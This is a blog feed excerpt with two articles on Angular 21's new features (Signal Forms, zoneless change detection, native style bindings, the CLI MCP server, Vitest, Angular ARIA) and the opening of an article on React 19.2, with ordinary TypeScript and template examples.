Angular 21: Signal Forms, Smart Styling, MCP & Beyond
International JavaScript Conference | https://javascript-conference.com/blog/angular-21-signal-forms-smart-styling-mcp/ | Fri, 14 Nov 2025

Angular v21 marks a historic architectural shift, completing the framework’s transition to a Signals-first, zoneless core that redefines reactivity, performance, and developer experience. This article explores the new Signal Forms API and introduces Smart Styling, Angular’s native approach to class and style bindings for maximum clarity and efficiency. You will also discover how the emerging Model Context Protocol (MCP) Server integrates AI directly into the Angular CLI, paving the way for intelligent, context-aware code generation and automated migrations in future releases.

The Signals-First Revolution and the New Architectural Core

Angular v21 does not merely introduce a new set of features; it completes a fundamental architectural revolution, decisively marking the framework’s entrance into a Signals-first, zoneless paradigm. This release resolves the historical performance and complexity bottlenecks that often accompany large-scale Angular applications, positioning the framework for superior runtime performance and a dramatically improved Developer Experience (DX).

The most profound shift lies in the near-complete transition from the coarse-grained, Zone.js-based change detection to a model of fine-grained reactivity driven by Signals. The traditional approach, which relied on Zone.js to patch browser asynchronous APIs, often resulted in unnecessary re-checks across the entire component tree after any async event.

Angular v21 finalizes the stability of its zoneless APIs, allowing applications to operate without this performance-limiting layer. This architectural change immediately results in smaller application bundles, faster startup times, and minimal runtime overhead, as the framework updates only the specific view nodes that depend on the changed signal value. This move aligns Angular with the highest performance standards set by other modern frameworks.
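To see why fine-grained reactivity avoids whole-tree re-checks, it can help to sketch the underlying dependency-tracking idea in plain TypeScript. The following is an illustrative toy, not Angular's actual signal implementation: a write to a signal notifies only the computations that read it.

```typescript
// Minimal signal/computed sketch -- illustrative only, NOT Angular's real implementation.
type Subscriber = () => void;
let active: Subscriber | null = null; // the computation currently being evaluated

interface WritableSignal<T> {
  (): T;
  set(next: T): void;
}

function signal<T>(initial: T): WritableSignal<T> {
  let value = initial;
  const subs = new Set<Subscriber>();
  const read = (() => {
    if (active) subs.add(active); // track whoever is currently computing
    return value;
  }) as WritableSignal<T>;
  read.set = (next: T) => {
    value = next;
    subs.forEach((s) => s()); // notify only the dependents of THIS signal
  };
  return read;
}

function computed<T>(fn: () => T): () => T {
  let value!: T;
  const recompute: Subscriber = () => {
    const prev = active;
    active = recompute;
    value = fn(); // reads inside fn register this computation as a dependent
    active = prev;
  };
  recompute();
  return () => value;
}

const count = signal(1);
const double = computed(() => count() * 2);
console.log(double()); // 2
count.set(5);          // only `double` recomputes; unrelated state is untouched
console.log(double()); // 10
```

Zone.js, by contrast, has no such dependency graph: it can only assume that *any* async event might have changed *anything*, and re-check broadly.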

Complementing this performance core is the continued maturation of the standalone architecture. By making standalone components and APIs the default for new applications, Angular v21 dramatically reduces reliance on NgModules, cutting down on boilerplate and streamlining project structure. This modular approach is vital for enterprise teams utilizing Micro-Frontend Architectures, enabling components to be easily portable and consumed across different applications. The release simplifies essential, common development tasks. For instance, HttpClient is now included by default for standalone projects, removing a small but persistent friction point for developers.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

These architectural advancements (Signals, zoneless readiness, and standalone stability) are the essential groundwork that enables the two major feature highlights of the release: the highly anticipated Signal Forms and the substantial ergonomic improvements of Smart Styling. These features move beyond simple updates, offering new patterns that will redefine component authorship and state management in Angular applications moving forward.

Looking ahead, the framework is strategically positioned in two key areas. First, the experimental work on the Angular CLI MCP Server is set to mature, paving the way for advanced AI-powered workflows in subsequent releases. This will allow sophisticated models to interact directly with the CLI’s internal tools to perform context-aware code generation, migration, and style adherence. Secondly, the successful transition of Forms to Signals now dictates the future of other packages. Subsequent major versions will focus on rolling out signal-based APIs for the Router and HttpClient (including the stabilization of the resource function), leading to a unified, end-to-end reactive data flow that completely simplifies asynchronous state management across the entire application. The future is an Angular where reactivity is not an optional add-on, but the fundamental, high-performance core of every component and service.

A Deep Dive into Signal Forms

The introduction of Signal Forms is perhaps the most highly anticipated and impactful feature of Angular v21, directly addressing the longstanding issues of complexity, verbosity, and leaky reactivity that plagued the previous Observable-based Reactive Forms API. This new system revolutionizes form handling by adopting a model-first, declarative approach that is inherently compatible with the new zoneless architecture.

Problem Solved: Eliminating Imperative Complexity

The traditional Reactive Forms API required the imperative creation and synchronization of state. Developers had to manually instantiate FormGroup and FormControl instances, define validators, and then manage state changes (like conditional disabling or cross-field validation) by manually subscribing to the valueChanges Observable. This led to error-prone subscription management, potential memory leaks from forgotten unsubscribe calls, and complex logic dispersed across the component class.

Signal Forms resolves this by making the form state a collection of native Signals. This shifts the forms architecture from managing a stream of values to managing a set of reactive values.

The result is:

  1. The form structure and its initial value are defined by a simple, strongly-typed model object wrapped in a writable signal.
  2. Form control values, validity, and status (e.g., touched, dirty) are all exposed as signals. The application’s view automatically reacts to these signals, completely eliminating the need for manual subscriptions and the ChangeDetectorRef when handling form state.
  3. Conditional logic, such as disabling one field based on another’s value, is defined directly within the form builder function using declarative statements that operate on the signals, not via manual valueChanges subscriptions.


Code Example: Declarative User Registration Form

To illustrate this simplification, consider a basic user registration form. The code demonstrates how the model, form definition, and template binding become seamlessly interconnected.

import { Component, signal } from '@angular/core';
import { JsonPipe } from '@angular/common';
import { form, required, email, minLength, Control } from '@angular/forms/signals';

// Define the clear, strongly-typed data model
interface UserRegistration {
  email: string;
  username: string;
}

@Component({
  selector: 'app-user-form',
  // Import the Control directive and the JsonPipe used in the template
  imports: [Control, JsonPipe],
  template: `
    <form (submit)="onSubmit($event)">
      <label>Email:
        <input type="email" [control]="registrationForm.email" />
      </label>
      @if (registrationForm.email().invalid()) {
        <div class="error-message">Email is invalid or required.</div>
      }
      
      <label>Username:
        <input type="text" [control]="registrationForm.username" />
      </label>
      @if (registrationForm.username().invalid()) {
        <div class="error-message">Username must be at least 4 characters.</div>
      }

      <button type="submit" [disabled]="registrationForm().invalid()">
        Register
      </button>
      
      <pre>Form Value: {{ registrationForm.value() | json }}</pre>
    </form>
  `
})
export class UserFormComponent {
  // 1. Define the model signal
  private readonly initialModel = signal<UserRegistration>({
    email: '',
    username: ''
  });

  // 2. Define the Signal Form, including validation rules
  public readonly registrationForm = form(
    this.initialModel,
    (p) => [ // 'p' is the path object representing the form structure
      required(p.email, { message: 'Email is required' }),
      email(p.email, { message: 'Must be a valid email format' }),
      required(p.username, { message: 'Username is required' }),
      minLength(p.username, 4, { message: 'Min length is 4' }),
    ]
  );

  onSubmit(event: SubmitEvent): void {
    event.preventDefault();
    if (this.registrationForm().valid()) {
      console.log('Submitted data:', this.registrationForm.value());
      // Here you would typically call a service to submit the data
    } else {
      console.error('Form is invalid.');
      // Logic to mark all fields as touched to show all errors
      // (The new API has methods like markAllAsTouched for this)
    }
  }
}

Here, the form’s structure is implicitly defined by the UserRegistration interface and the initialModel signal. The form() function then wraps this model.

Validators (required, email, minLength) are not passed as constructor arguments in arrays but are declared separately in a functional array within the form() call. This separates model definition from validation logic, improving readability.
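One practical consequence of this separation can be shown with a framework-free sketch. The required and minLength helpers below are invented stand-ins, not the real @angular/forms/signals functions; the point is that rules declared as plain data, apart from the model, can be run against any model object without instantiating a form.

```typescript
// Conceptual sketch of functional, field-based validation
// (invented helper names, NOT the Signal Forms internals).
interface UserRegistration { email: string; username: string; }

type Rule<M> = { field: keyof M; check: (v: unknown) => boolean; message: string };

const required = <M>(field: keyof M, message: string): Rule<M> => ({
  field,
  check: (v) => typeof v === 'string' && v.length > 0,
  message,
});

const minLength = <M>(field: keyof M, min: number, message: string): Rule<M> => ({
  field,
  check: (v) => typeof v === 'string' && v.length >= min,
  message,
});

// The rule set lives together, separate from the model definition:
const rules: Rule<UserRegistration>[] = [
  required('email', 'Email is required'),
  required('username', 'Username is required'),
  minLength('username', 4, 'Min length is 4'),
];

function validate(model: UserRegistration): string[] {
  return rules.filter((r) => !r.check(model[r.field])).map((r) => r.message);
}

console.log(validate({ email: '', username: 'abc' }));
// -> [ 'Email is required', 'Min length is 4' ]
```

Because the rules are just data plus pure functions, they are trivially unit-testable in isolation, which is part of what the declarative style buys you.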

In the template, the new [control] directive replaces formControlName and ngModel. It binds the input element directly to a control signal (registrationForm.email), making the binding explicit and reactive.

Checking validity is trivial: @if (registrationForm.email().invalid()) immediately accesses the state of the email control signal without any pipe or subscription. Similarly, the submit button is disabled via [disabled]="registrationForm().invalid()", leveraging the parent form's computed validity signal.

So, by embracing Signals, the Signal Forms API simplifies the core development loop: define the model, apply validations functionally, and access state reactively in the template. This makes forms significantly easier to reason about, test, and maintain, especially in large, complex applications.


Explanation of Angular Form State Methods

Angular forms rely on tracking various states to determine when to show errors or enable submission.

The methods valid() and invalid() reflect the current validation status of a control or the entire form based on the rules you defined. For instance, the form submission button uses [disabled]="registrationForm().invalid()" to ensure it can only be clicked if the data meets all requirements, meaning registrationForm().valid() is true.

// If the email field passes all validation rules
// Example: the user typed "[email protected]"
registrationForm.email().valid(); // true

// If the username is empty (and required)
// Example: the user typed nothing
registrationForm.username().invalid(); // true

The methods dirty() and pristine() track whether the user has modified the initial value of a control. A control starts as pristine (control().pristine() is true). As soon as the user types a single character, it becomes dirty, making control().dirty() true, and it remains so until you manually reset the form.

// Initial load state
// Example: the form is first displayed
registrationForm.email().pristine(); // true

// After the user types "a" in the email field
registrationForm.email().dirty(); // true

The methods touched() and untouched() track user interaction by focus. A control starts as untouched and only becomes touched (control().touched() is true) after the user has focused on the field and then clicked or tabbed away (the "blur" event). This is often combined with the invalid state, e.g. @if (registrationForm.email().invalid() && registrationForm.email().touched()), to avoid showing an error the moment the form first loads.

<!-- The error message only shows if the email is invalid AND the user has left the field -->
@if (registrationForm.email().invalid() && registrationForm.email().touched()) {
  <!-- Show error here -->
}

Finally, the markAllAsTouched() method, which is not a state but an action, forces the touched() status to true for every control inside the form group. We use this.registrationForm().markAllAsTouched() inside the onSubmit method when the form is invalid to ensure all users see all potential errors right away, instead of only seeing them one by one as they manually interact with each field.

// Called when the user clicks submit but the form is invalid 
this.registrationForm().markAllAsTouched();

You can see a fully operational example in the code below. Note that, as its comments point out, it is built with the stable Reactive Forms API (FormGroup and FormControl) rather than the experimental Signal Forms, to ensure stable compilation.

import { ChangeDetectionStrategy, Component } from '@angular/core';
import { FormGroup, FormControl, Validators, ReactiveFormsModule, ValidationErrors } from '@angular/forms';
import { JsonPipe, NgIf, NgClass } from '@angular/common';

// The application uses standard Reactive Forms (FormGroup, FormControl)
// instead of the experimental Signal Forms to ensure stable compilation.

@Component({
  standalone: true,
  selector: 'app-root', 
  // Import ReactiveFormsModule to enable directives like formGroup and formControlName
  imports: [ReactiveFormsModule, NgIf, JsonPipe, NgClass], 
  template: `
    <div class="p-8 max-w-lg mx-auto bg-white shadow-xl rounded-xl">
      <h2 class="text-3xl font-extrabold text-indigo-700 mb-6 border-b pb-2">User Registration</h2>
      
      <!-- Bind the formGroup to the HTML form element -->
      <form [formGroup]="registrationForm" (ngSubmit)="onSubmit()" class="space-y-5">

        <!-- Email Field -->
        <div class="form-group">
          <label class="block text-sm font-medium text-gray-700 mb-1" for="email">Email:</label>
          <input id="email" type="email" formControlName="email" 
                 placeholder="[email protected]"
                 class="w-full p-2 border border-gray-300 rounded-lg focus:border-indigo-500 transition duration-150" />
          
          <!-- Access the email control to check state and errors -->
          @if (emailControl.invalid && emailControl.touched) {
            <div class="mt-1 text-sm text-red-600">
              {{ getFirstErrorMessage(emailControl.errors) }}
            </div>
          }
        </div>
          
        <!-- Username Field -->
        <div class="form-group">
          <label class="block text-sm font-medium text-gray-700 mb-1" for="username">Username:</label>
          <input id="username" type="text" formControlName="username" 
                 placeholder="min. 4 characters"
                 class="w-full p-2 border border-gray-300 rounded-lg focus:border-indigo-500 transition duration-150" />

          <!-- Access the username control to check state and errors -->
          @if (usernameControl.invalid && usernameControl.touched) {
            <div class="mt-1 text-sm text-red-600">
              {{ getFirstErrorMessage(usernameControl.errors) }}
            </div>
          }
        </div>

        <!-- Submit Button -->
        <button type="submit" 
                [disabled]="registrationForm.invalid"
                class="w-full py-2 px-4 rounded-lg text-white font-semibold transition duration-200"
                [ngClass]="registrationForm.invalid ? 'bg-gray-400 cursor-not-allowed' : 'bg-indigo-600 hover:bg-indigo-700 shadow-md'">
          Register
        </button>
          
        <!-- Form State Debug -->
        <div class="p-3 bg-gray-50 border rounded-lg text-xs font-mono mt-5">
          <p>Valid: {{ registrationForm.valid | json }}</p>
          <p>Touched: {{ registrationForm.touched | json }}</p>
          <p>Dirty: {{ registrationForm.dirty | json }}</p>
          <pre>Value: {{ registrationForm.value | json }}</pre>
        </div>
      </form>
    </div>
  `,
  styles: [`
    /* Using native CSS for the component for clean styling */
    .form-group {
      margin-bottom: 1.25rem;
    }
  `],
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class App {
  // Define the main form group with all controls and validators
  public registrationForm = new FormGroup({
    email: new FormControl('', {
      validators: [
        Validators.required, 
        Validators.email
      ],
      nonNullable: true
    }),
    username: new FormControl('', {
      validators: [
        Validators.required, 
        Validators.minLength(4)
      ],
      nonNullable: true
    })
  });

  // Helper getters for easy access in the template
  get emailControl(): FormControl {
    return this.registrationForm.get('email') as FormControl;
  }
  
  get usernameControl(): FormControl {
    return this.registrationForm.get('username') as FormControl;
  }


  onSubmit(): void {
    
    // Check form validity (using the .valid property)
    if (this.registrationForm.valid) {
      console.log('Submitted data:', this.registrationForm.value);
      // Successful submission logic (e.g., API call)
    } else {
      console.error('Form is invalid. Marking all controls as touched.');
      
      // Action: Mark all controls as touched to trigger immediate error display 
      this.registrationForm.markAllAsTouched();
    }
  }

  // Helper to extract the first error message from the ValidationErrors object
  getFirstErrorMessage(errors: ValidationErrors | null): string {
    if (!errors) {
      return '';
    }
    const errorKey = Object.keys(errors)[0];
    
    // Custom messages are not easily passed with standard Validators, 
    // so we return a friendly default based on the validator key.
    if (errorKey === 'required') {
        return 'This field is required.';
    }
    if (errorKey === 'email') {
        return 'Must be a valid email format.';
    }
    if (errorKey === 'minlength' && errors['minlength']) {
        const requiredLength = errors['minlength'].requiredLength;
        return `Minimum length is ${requiredLength} characters.`;
    }

    // Fallback
    return `Validation failed for: ${errorKey}`;
  }
}


Smart Styling, Performance, and Future Outlook

Angular v21 completes the picture of a modernized framework not only through its core architectural shifts but also by refining its template directives, turbocharging its Server-Side Rendering (SSR) capabilities, and laying the strategic groundwork for future innovations like sophisticated AI tooling.

The concept of Smart Styling in Angular v21 revolves around an official endorsement of native HTML bindings over historical directive abstractions, improving both performance and code clarity. The framework is guiding developers away from the use of NgClass and NgStyle, which are being softly deprecated. While these directives remain functional for backward compatibility, the recommended best practice is now to use the native [class] and [style] bindings. This strategic pivot aligns Angular more closely with standard web practices and leverages the native efficiency of the browser’s DOM manipulation.

The rationale is twofold: performance gains and simplification. Native bindings directly manipulate DOM properties, removing the small but measurable overhead of intermediary directives, leading to cleaner code and simpler debugging. For instance, dynamic class assignment is now cleaner using expressions like [class.active]="isActiveSignal()", seamlessly integrated with the Signal-driven reactivity. This emphasis on native expression binding is part of a broader template optimization effort, which also includes the final stabilization of the new built-in template control flow (@if, @for), eliminating the need for *ngIf and the associated CommonModule boilerplate.

Example: Smart Styling with Native Bindings

The following component demonstrates how to use native property bindings ([class] and [style]) with Signals, which is the recommended practice over the soft-deprecated NgClass and NgStyle directives. This approach is cleaner, more performant, and instantly familiar to anyone experienced with standard HTML and JavaScript.

The component defines signals for state (an alert count and a theme preference) and uses a computed() signal to derive complex styling properties.

import { Component, signal, computed } from '@angular/core';

@Component({
  standalone: true,
  selector: 'app-smart-alert',
  template: `
    <div 
      [class.error]="alertCount() > 0"
      [class.warn]="alertCount() > 5"
      [class.dark-theme]="isDarkTheme()"
      [style.font-size.px]="alertFontSize()"
      [style.border-color]="borderColorComputed()"
    >
      You have {{ alertCount() }} outstanding alerts.
      <button (click)="alertCount.update(c => c + 1)">Add Alert</button>
      <button (click)="isDarkTheme.set(!isDarkTheme())">Toggle Theme</button>
    </div>
  `,
  styles: [`
    .error { color: red; }
    .warn { font-weight: bold; }
    .dark-theme { background-color: #333; color: #fff; }
  `]
})
export class SmartAlertComponent {
  // Writable Signals for state
  public readonly alertCount = signal(2);
  public readonly isDarkTheme = signal(false);

  // Computed Signal for derived class property
  public readonly alertFontSize = computed(() => {
    // Dynamically increase font size based on the alert count
    return 16 + Math.min(this.alertCount(), 10);
  });

  // Computed Signal for derived style property
  public readonly borderColorComputed = computed(() => {
    // Logic to switch border color based on theme
    return this.isDarkTheme() ? '#777' : '#000';
  });
}

Comparing the old and new approaches:

Direct Class Binding ([class.name]="expression"):

  • Old Way: <div [ngClass]="{'error': alertCount > 0}">… required an external object evaluation or a dictionary-style input.
  • New Way: <div [class.error]="alertCount() > 0">… uses a direct property binding. Angular adds the class error only when the bound Signal expression is truthy. This is the simplest, most performant way to toggle a single class.

Native Style Binding ([style.property.unit]="value"):

  • Old Way: <div [ngStyle]="{'font-size.px': 16 + alertCount}">… relied on the NgStyle directive.
  • New Way: <div [style.font-size.px]="alertFontSize()">… uses the native [style] binding. The .px suffix is an Angular feature that binds the unit directly to a number type, ensuring correct and efficient DOM manipulation without string concatenation boilerplate in the template.

Signal Integration:

Both the class and style bindings are consuming the results of signals (alertCount(), isDarkTheme(), and the derived alertFontSize()). Because these are native Signals, Angular’s fine-grained reactivity ensures that if the alertCount updates, only the specific class and style properties related to the alert count will be re-evaluated and applied to the DOM, preserving maximum performance and avoiding unnecessary checks.

This declarative pattern, combining Signals with native bindings, is the essence of smart styling in Angular v21, leading to code that is more readable, maintainable, and highly optimized for the modern web.

AI Integration: The CLI Model Context Protocol (MCP) Server

Angular v21 introduces a profound, strategic enhancement that prepares the framework for the next era of software development: the Angular CLI Model Context Protocol (MCP) Server. This addition is not a developer-facing feature in the traditional sense, but rather a critical architectural middleware that transforms generic Large Language Models (LLMs) and coding assistants into highly specialized, context-aware Angular co-pilots. This mechanism is paramount to maximizing developer velocity while simultaneously preserving code quality and project consistency.

Bridging the Gap: Context vs. Training Data

The core problem the MCP Server solves is the inherent limitation of AI training data. An LLM’s knowledge of Angular is static, based on information available up to its last training cut-off. For a rapidly evolving framework like Angular, this means models often generate outdated code (e.g., using deprecated NgModules, RxJS patterns, or old syntax).

The MCP Server effectively closes this gap by providing real-time, authoritative context. It acts as a specialized agent that runs alongside the Angular CLI, exposing a curated set of internal tools to the AI model. When a developer asks the AI to perform a task, the AI can call these tools to retrieve the live, current state of the project and the framework.
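The tool-exposure pattern described here can be sketched as a simple allow-listed registry. All names below are invented for illustration; the real MCP protocol is richer (a JSON-RPC transport, tool schemas, and more), but the core property is the same: the model can discover and invoke only what the server deliberately advertises.

```typescript
// Hypothetical sketch of MCP-style tool exposure (names invented for illustration;
// this is not the Angular CLI's actual MCP implementation).
type Tool = { description: string; run: (args: Record<string, string>) => string };

const tools: Record<string, Tool> = {
  read_workspace_config: {
    description: 'Return project conventions (prefix, style) from angular.json',
    run: () => JSON.stringify({ prefix: 'app', style: 'scss' }),
  },
  list_migrations: {
    description: 'List available migration schematics',
    run: () => JSON.stringify(['control-flow', 'signal-inputs']),
  },
};

function callTool(name: string, args: Record<string, string> = {}): string {
  const tool = tools[name];
  // Anything outside the allow-list is rejected: no arbitrary shell or file access.
  if (!tool) throw new Error(`Tool "${name}" is not exposed`);
  return tool.run(args);
}

console.log(Object.keys(tools)); // the model can discover only these tools
console.log(callTool('read_workspace_config'));
```

The allow-list is what turns a general-purpose model into a constrained, project-aware assistant rather than an agent with open access to the machine.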

Strategic Use Cases for Development Teams

The integration of the MCP Server enables several powerful, project-specific workflows:

  1. When a developer prompts the AI to “generate a component for the checkout feature,” the AI can call a tool exposed by the MCP Server to read the local angular.json file. This provides instant knowledge of the project’s naming conventions, component prefixes, styling preferences (e.g., SCSS vs. CSS), and directory structure. The resulting code is guaranteed to conform to the team’s established standards, minimizing time spent on boilerplate and code review corrections.
  2. The Server can expose tools related to migration schematics. This allows the AI to analyze existing code and automatically apply the necessary Signal-based refactoring or structural changes (like converting *ngIf to @if). This dramatically reduces the risk and manual effort involved in keeping a large codebase current with the latest high-performance best practices.
  3. The Server ensures the AI always references the correct, current API. For instance, when generating code using Signal Forms, the AI is prompted to retrieve the v21 API details via the Server’s tools, preventing it from incorrectly generating logic based on the legacy Observable patterns.

Moreover, the MCP Server is designed with necessary security and integrity safeguards. The protocol dictates that the CLI only exposes specific, predefined tools, avoiding general-purpose file system or shell execution access. This strict limitation on the model’s access minimizes the attack surface. Furthermore, the final stage of any AI-driven workflow requires the “Human-in-the-Loop” (HITL). All generated code is provided as a suggestion or diff, ensuring that the developer remains the ultimate authority, reviewing and testing every AI-generated change before it is committed to the codebase. The MCP Server thus empowers teams to leverage AI as a sophisticated accelerator without compromising on quality or control.


Conclusion

Angular 21 represents a pivotal step in the framework’s evolution, solidifying its commitment to performance, simplicity, and developer experience. By embracing Signals for state management and modernizing its core architecture, Angular offers developers a powerful, yet increasingly streamlined, platform for building robust applications. These updates reduce boilerplate, improve runtime performance, and ensure that Angular remains a top-tier choice for scalable, enterprise-level development.

With these improvements in place, developers are better equipped than ever to focus on solving complex business problems with clean, efficient, and maintainable code.

What’s New in Angular 21?
International JavaScript Conference | https://javascript-conference.com/blog/angular-21-signal-forms-zoneless-vitest/ | Wed, 05 Nov 2025

Angular 21 introduces a new era of efficiency and developer-friendly design. With experimental Signal Forms and default zoneless change detection, this release focuses on performance and reactivity. Let's explore how these updates shape the framework’s future and simplify everyday development.

If you’ve been following Angular’s journey, version 21 brings some fresh air with features that many developers have been waiting for. The long-awaited Signal Forms are finally arriving. Although they’re experimental, this feature gives a glimpse into a smoother, more reactive approach to handling forms in Angular. Meanwhile, zoneless change detection is now enabled by default, boosting the framework’s performance and making your life easier. Let’s go over some of the cool updates coming in Angular 21.


Signal Forms

Angular 21 introduces Signal Forms, an experimental but promising feature that offers a fresh, declarative, and reactive way to manage form state using signals. To better understand how Signal Forms work in practice, let’s walk through the basic steps of creating one, starting with defining your form’s state as a signal.

interface CrewMember {
  name: string;
  imageUrl: string;
  position: string;
}

crewMember = signal<CrewMember>({
  name: '',
  imageUrl: '',
  position: ''
});

crewForm = form(this.crewMember);

This setup defines a signal holding the crew member’s model. You can then pass this model to Angular’s form() function to create the reactive form tree reflecting this structure.

The next step is to bind individual signal form fields to your HTML elements using the Field directive. This directive creates a two-way binding between the input element and the form’s signal model. Any changes in the input automatically update the form state, and any updates to the model immediately reflect in the input. Using it is really straightforward: just add [field] to your input elements and assign the corresponding form field. Remember to import the Field directive in your component’s imports array; otherwise, Angular won’t recognize it.

<input type="text" [field]="crewForm.name" placeholder="Enter pirate name">
<input type="url" [field]="crewForm.imageUrl" placeholder="Enter image URL">
<input type="text" [field]="crewForm.position" placeholder="Enter crew position">
…
<!--Preview-->
<div>
   <p>Name: {{ crewForm.name().value() }}</p>
   <p>Position: {{ crewForm.position().value() }}</p>
</div>
<img [src]="crewMember().imageUrl">

In this example, you can see inputs bound to the crewForm fields for name, image URL, and position. Just below, there’s a live preview that shows how you can display the current form values by accessing crewForm.name().value() or crewForm.position().value(). Similarly, the image URL is read from the original crewMember signal, demonstrating how both the crewForm and the crewMember signal stay in sync.

Figure 1: Signal Form live preview


Validation

To add validation in Signal Forms, pass a schema function into the form() method. The function can include built-in validators, such as required, email, or minLength, alongside your own custom validation logic. Error messages can be customized via options, allowing friendly and precise feedback for users interacting with forms.

crewForm = form(this.crewMember, (path) => {
    required(path.name, { message: 'Name is required' });
    minLength(path.name, 2, { message: 'Name must be at least 2 characters long' });
    required(path.position, { message: 'Position is required' });
    required(path.imageUrl, { message: 'Image URL is required' });
  });

To show validation errors for a form field, first check if the field has been touched (if the user has interacted with it) and is currently invalid. This prevents displaying errors like ‘required’ prematurely before the user starts typing.

You can get the list of errors for the field by accessing its errors() signal, and then display the error message.

@if(crewForm.name().touched() && crewForm.name().invalid()) {
     <ul class="error-message">
       @for(error of crewForm.name().errors(); track $index) {
            <li>{{ error.message }}</li>
       }
     </ul>
 }

Signal Form validation errors

Figure 2: Signal Form validation errors

These examples illustrate the basic usage of Signal Forms to demonstrate core concepts. Check the Angular official docs to learn more about Signal Forms and their evolving functionality. Since this is an experimental API, expect some changes, but also a bright future for building forms declaratively and reactively.

Zoneless by default

Starting with Angular 21, zoneless change detection is now enabled by default. No more Zone.js dependency. The Zoneless API has been stable since Angular 20.2, but version 21 takes it further: there’s no need to import provideZonelessChangeDetection in your app config, as all new Angular applications are now zoneless out of the box.

In a zoneless app, change detection no longer triggers automatically on every async task, like HTTP requests, observables, or timers such as setTimeout or setInterval. This is a big shift compared to how Zone.js worked. Now, change detection runs only when explicitly triggered by certain actions, including:

  • Async pipe
  • User-bound events like clicks or input events
  • Signal value updates used in the template
  • markForCheck()
  • Calls to ComponentRef.setInput()
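The trigger list above boils down to one idea: work is scheduled only on explicit writes. A toy model of fine-grained reactivity makes this concrete (purely illustrative; Angular's real signal implementation differs):

```typescript
// Toy model of fine-grained reactivity (illustrative only; not Angular's
// internals): a write to a signal schedules exactly the consumers that read
// it, instead of re-checking the whole component tree.
type Effect = () => void;

let activeEffect: Effect | null = null;
const pending = new Set<Effect>();

function signal<T>(initial: T) {
  let value = initial;
  const subscribers = new Set<Effect>();
  return {
    get(): T {
      if (activeEffect) subscribers.add(activeEffect); // track the reader
      return value;
    },
    set(next: T) {
      value = next;
      subscribers.forEach((e) => pending.add(e)); // schedule, don't run yet
    },
  };
}

function effect(fn: Effect) {
  activeEffect = fn;
  fn(); // the first run records which signals this effect depends on
  activeEffect = null;
}

// flush() plays the role of the framework's scheduler tick
function flush() {
  pending.forEach((e) => e());
  pending.clear();
}

const count = signal(0);
const renders: number[] = [];
effect(() => renders.push(count.get()));

count.set(1); // explicit trigger: only this one effect gets scheduled
flush();
console.log(renders); // [ 0, 1 ]
```

Nothing here re-checks a tree; until `set()` is called, no rendering work is scheduled at all, which is the behavior the zoneless triggers above describe.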

Going zoneless breaks free from the old Zone.js magic, so change detection fires only on explicit triggers you control, avoiding unnecessary change detection cycles and resulting in better app performance. Removing Zone.js also shrinks the bundle size, which improves Core Web Vitals. Debugging gets cleaner as well, since stack traces are no longer polluted by Zone.js. For best performance, pairing zoneless mode with the OnPush strategy is highly recommended.

Another important advantage is improved compatibility with the wider ecosystem. Since Zone.js patches browser APIs, it sometimes struggles to keep up with new APIs or modern JavaScript features like async/await, which require special handling. Eliminating Zone.js removes this layer of complexity, leading to better long-term maintainability and fewer compatibility headaches.

For in-depth details, migration advice, and performance insights, check out my full guide.

Vitest – New Default Testing Framework

Angular 21 introduces Vitest as the new standard testing framework, replacing Jasmine and Karma for newly created projects. This shift comes after years of uncertainty following Karma’s deprecation in 2023, providing Angular developers with a clear, modern, and efficient testing solution.

Key Benefits:

  • Fast test runs powered by the Vite build tool
  • Native support for TypeScript and ESM
  • Real browser environment testing
  • Modern and rich API

Angular’s move to Vitest means better alignment with the modern JS ecosystem, and future migration utilities will ease switching from Jasmine. Developers will run tests the same way with ng test. Importantly, Jasmine and Karma can still be chosen instead of Vitest if needed.

The Vitest test result in console

Figure 3: The Vitest test result in console


Angular ARIA

Angular ARIA is a library created in response to developer requests for accessible components that are simpler to style. It provides a collection of headless Angular directives implementing common accessibility patterns without any predefined styles, allowing developers full control over styling.

Currently, the Angular ARIA library includes accessible directives for the following UI components:

  • Accordion
  • Combobox
  • Listbox
  • Radio Group
  • Tabs
  • Toolbar

For example, the ngListbox and ngOption directives turn plain elements into an accessible listbox:

<div ngListbox>
  @for (item of crew.value(); track item.id) {
    <div [value]="item.name" ngOption>{{ item.name }}</div>
  }
</div>

ARIA roles and attributes automatically added by using Angular ARIA directives

Figure 4: ARIA roles and attributes automatically added by using Angular ARIA directives

Other Improvements

Angular 21 goes beyond major new features by delivering various improvements, migrations, and quality enhancements that together modernize and optimize Angular apps.

  • The HttpClient is built in by default, so new projects no longer require manual setup of provideHttpClient().
  • Migration Scripts:
    • Migration from NgClass to class bindings:
      ng generate @angular/core:ngclass-to-class
    • Migration from NgStyle to style bindings:
      ng generate @angular/core:ngstyle-to-style
    • Migration of RouterTestingModule usages inside tests to RouterModule:
      ng generate @angular/core:router-testing-module-migration
    • Replacement of CommonModule imports with standalone imports:
      ng generate @angular/core:common-to-standalone
  • CLI support for Tailwind CSS config generation, making it easier to set up Tailwind CSS in Angular projects right from project creation.

CLI support for Tailwind CSS config generation

Figure 5: CLI support for Tailwind CSS config generation

In addition to these changes, Angular 21 includes numerous bug fixes, performance improvements, and developer experience enhancements that make the framework more stable, efficient, and user-friendly.


Conclusion

Angular 21 delivers a thoughtful balance of innovation and refinement, introducing tools that make modern app development more efficient and enjoyable. Signal Forms, Vitest, default zoneless mode, and Angular ARIA directives all emphasize what this update is about: speed, clarity, and accessibility.

Angular continues to prove that a mature framework can still innovate, adapt, and surprise.

References

  1. Angular documentation
  2. ng-conf 2025 LIVE Angular Team Keynote
  3. Vitest documentation

The post What’s New in Angular 21? appeared first on International JavaScript Conference.

]]>
React 19.2 Explained: Updates, Impact, and What to Watch For https://javascript-conference.com/blog/react-19-2-updates-performance-activity-component/ Sun, 26 Oct 2025 17:30:22 +0000 https://javascript-conference.com/?p=108484 React 19.2 brings targeted improvements to performance, rendering, and overall developer experience. Key highlights include updates to the core library and optimizations in React DOM for faster, more efficient UI rendering. Let’s take a closer look at what’s new.

The post React 19.2 Explained: Updates, Impact, and What to Watch For appeared first on International JavaScript Conference.

]]>
What a month for the React ecosystem! On October 7th at the React Conference in Henderson, Nevada, the React Foundation was announced, marking a new era of technical governance for the library and its related projects, including JSX. The founding members include Amazon, Callstack, Expo, Meta, and Vercel, with Expo and Callstack representing major players in the React Native space.

Just a few days before that, the React Team released version 19.2. This release brings new features for component rendering and better performance tools.

These days, most developers start React projects using frameworks like Next.js. On the 9th of October, the team announced the beta for Next.js version 16, which will bake in support for React 19.2. With major support coming soon, let’s look at what’s new in React 19.2 and how you can use these updates in everything from side projects to production grade applications.

